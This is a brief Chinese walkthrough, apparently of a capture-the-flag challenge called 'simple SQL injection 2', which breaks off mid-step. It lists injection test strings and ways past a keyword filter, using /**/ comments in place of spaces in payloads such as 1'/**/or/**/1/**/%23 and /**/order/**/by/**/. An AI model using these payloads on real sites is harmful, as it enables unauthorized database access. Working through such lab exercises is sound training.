簡單的SQL注入之2

簡單的sql注入之2 1.查看是否存在注入 輸入‘ 2. 輸入「 1'/**/or/**/1/**/%23 1'/**/and/**/0/**/%23 2.查看select是否被過濾 輸入select發現被過濾 發現不過濾/**/select/**/ 存在sql注入 查看有幾列 1. order by 被過濾 ,試試/**/order/***/by/**/ 2. 1'/**/or/**/1/**/
相關文章
相關標籤/搜索